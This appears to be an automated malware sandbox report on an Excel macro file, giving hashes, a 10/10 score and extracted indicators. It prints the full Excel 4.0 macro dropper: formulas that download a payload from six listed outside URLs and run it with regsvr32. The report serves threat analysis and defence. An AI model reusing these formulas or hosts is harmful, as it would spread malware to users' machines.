Overview

overview

10

Static

static

10

a0cfd78c95...c.xlsm

windows7-x64

10

a0cfd78c95...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

  • Size

    45KB

  • Sample

    241120-s2hd3syckd

  • MD5

    0a50fafea0c83f5de828cd2c91ad83eb

  • SHA1

    825bea68ee3aaf3549f8c467ab810077820d04db

  • SHA256

    a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

  • SHA512

    6840398b6a78fceee4d69d750036d84ddaf882076848e63d86fc7a052766967d08b000513b91fd0e1a53fd82f96ff4976a16aee8c51532c55ae9de20c4414497

  • SSDEEP

    768:aqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:JrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/

http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/

http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

https://getlivetext.com/Pectinacea/AL5FVpjleCW/

http://janshabd.com/Zgye2/

https://justforanime.com/stratose/PonwPXCl/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/Zgye2/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://justforanime.com/stratose/PonwPXCl/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/
xlm40.dropper

http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/
xlm40.dropper

http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

Targets

    • Target

      a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

    • Size

      45KB

    • MD5

      0a50fafea0c83f5de828cd2c91ad83eb

    • SHA1

      825bea68ee3aaf3549f8c467ab810077820d04db

    • SHA256

      a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

    • SHA512

      6840398b6a78fceee4d69d750036d84ddaf882076848e63d86fc7a052766967d08b000513b91fd0e1a53fd82f96ff4976a16aee8c51532c55ae9de20c4414497

    • SSDEEP

      768:aqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:JrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks